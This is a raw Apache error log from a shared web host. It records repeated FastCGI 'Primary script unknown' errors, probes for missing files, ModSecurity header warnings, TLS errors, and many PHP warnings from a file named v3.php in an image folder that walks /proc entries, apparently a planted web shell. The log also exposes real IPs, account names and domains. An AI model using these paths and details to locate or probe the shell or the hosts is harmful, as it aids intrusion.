[Tue May 12 05:46:36.311270 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:36.456928 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:36.579248 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:36.700403 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:37.810984 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:37.945379 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:38.075467 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:38.208798 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:38.330064 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:38.451249 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:38.572567 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:38.693724 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:38.837105 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:38.958327 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:40.424641 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:40.548245 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:40.674097 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:40.796401 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:40.953591 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:41.488611 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:42.542026 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:42.668549 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:42.811105 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:43.487379 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:43.623034 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:43.753947 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:43.875841 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:43.997055 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:44.117940 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:44.258488 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:44.379945 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:44.500833 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:44.622041 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:44.743166 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:44.863765 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:44.984995 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:45.107453 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:45.230709 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:45.355415 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:46.000479 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:46.926497 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:47.065164 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:47.195222 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:47.330248 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:47.451178 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:47.593423 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:47.714104 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:47.843019 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:47.963542 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:48.084130 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:48.204603 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:48.326775 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:48.447541 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:48.583129 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:49.145394 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:49.881401 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:50.016745 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:50.141555 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:50.278004 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:50.401040 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:50.540128 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:50.678706 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:50.799705 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:50.948252 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:51.073507 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:51.194567 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:51.329118 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:51.452776 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:51.573849 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:51.695229 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:51.836471 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:51.974314 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:52.104066 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:52.241053 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:52.365206 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:53.552360 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:53.709686 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:53.853624 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:54.034551 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:54.161765 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:54.288290 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:54.439972 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:54.616334 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:54.748507 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:54.896297 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:56.130314 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:56.279297 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:56.436452 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:56.576625 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:56.697515 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:56.819399 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:56.962901 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:57.086015 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:57.207192 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:57.328457 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:01.248611 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:01.369197 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:01.487356 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:01.611989 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:01.743639 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:01.887559 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:02.032188 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:02.181041 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:02.303653 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:02.433444 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:02.556927 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:02.714501 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:02.845703 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:02.966238 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:03.088025 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:03.215439 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:03.333396 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:03.463252 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:03.624528 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:03.742870 2026] [proxy_fcgi:error] [pid 1825179:tid 1825222] [client 172.212.136.43:50098] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:47:10.552419 2026] [authz_core:error] [pid 1825179:tid 1825206] [client 47.128.23.249:34568] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/sodium_compat/src/error_log
[Tue May 12 05:47:36.840246 2026] [:error] [pid 1825287:tid 1825318] [client 65.49.1.66:5054] File does not exist: /home/totalcloud/public_html/index.php
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174175/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174175/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174175/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174175/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174175/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174175/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:48:19.072197 2026] [authz_core:error] [pid 1842385:tid 1842406] [client 20.151.0.198:30602] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2079/readme.php
PHP Warning:  filesize(): stat failed for /proc/13/task/13/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/13/task/13/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/13/task/13/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/13/task/13/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/13/task/13/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/13/task/13/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:48:30.807075 2026] [authz_core:error] [pid 1842385:tid 1842406] [client 20.151.0.198:30602] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2079/plugins/Cache/footer.php
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720862/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720862/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720862/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720862/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720862/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720862/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704820/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704820/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704820/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704820/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704820/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704820/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:49:03.095558 2026] [security2:error] [pid 1842385:tid 1842399] [client 129.226.146.42:50166] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "moncampingcarenligne.com"] [uri "/"] [unique_id "agKjLxs7kySIUZ3ORnIsAgAAAQk"]
[Tue May 12 05:49:05.074614 2026] [autoindex:error] [pid 1820198:tid 1820201] [client 207.90.244.23:60334] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/566/task/566/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/566/task/566/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/566/task/566/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/566/task/566/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/566/task/566/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/566/task/566/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:49:21.073436 2026] [:error] [pid 1825179:tid 1825197] [client 207.90.244.23:35230] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:23.234409 2026] [:error] [pid 1844863:tid 1844878] [client 207.90.244.23:35242] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:24.593551 2026] [:error] [pid 1820198:tid 1820213] [client 207.90.244.23:35250] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:26.368761 2026] [:error] [pid 1825287:tid 1825322] [client 207.90.244.23:35254] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:32.826399 2026] [:error] [pid 1808852:tid 1808857] [client 207.90.244.23:52136] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:34.066145 2026] [:error] [pid 1820198:tid 1820218] [client 207.90.244.23:52150] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:36.312733 2026] [:error] [pid 1825179:tid 1825220] [client 207.90.244.23:52158] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:38.910601 2026] [security2:error] [pid 1842385:tid 1842414] [client 43.133.66.51:46456] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/chat-bot/"] [unique_id "agKjUhs7kySIUZ3ORnIsQgAAARc"]
[Tue May 12 05:49:41.956018 2026] [:error] [pid 1825287:tid 1825326] [client 143.110.194.7:39060] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:42.639954 2026] [:error] [pid 1808852:tid 1808879] [client 143.110.194.7:59392] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:43.390270 2026] [:error] [pid 1820198:tid 1820206] [client 143.110.194.7:59406] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:44.085884 2026] [:error] [pid 1808852:tid 1808861] [client 143.110.194.7:59418] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:49:52.058099 2026] [ssl:error] [pid 1825179:tid 1825197] [client 143.110.194.7:59430] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname pweil.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 12 05:49:54.584635 2026] [ssl:error] [pid 1844863:tid 1844878] [client 143.110.194.7:42442] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname pweil.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 12 05:49:58.250164 2026] [ssl:error] [pid 1825179:tid 1825209] [client 143.110.194.7:42446] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname pweil.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 12 05:49:58.550783 2026] [ssl:error] [pid 1844863:tid 1844888] (EAI 2)Name or service not known: [client 43.165.65.117:45822] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:49:58.550825 2026] [ssl:error] [pid 1844863:tid 1844888] AH01941: stapling_renew_response: responder error
[Tue May 12 05:49:58.753935 2026] [security2:error] [pid 1844863:tid 1844888] [client 43.165.65.117:45822] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "happy-baby-box.fr"] [uri "/"] [unique_id "agKjZvaAnTZtx1_H_wy8ggAAAVM"], referer: http://happy-baby-box.fr
[Tue May 12 05:50:01.488789 2026] [ssl:error] [pid 1820198:tid 1820214] (EAI 2)Name or service not known: [client 43.165.65.117:51084] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:01.488831 2026] [ssl:error] [pid 1820198:tid 1820214] AH01941: stapling_renew_response: responder error
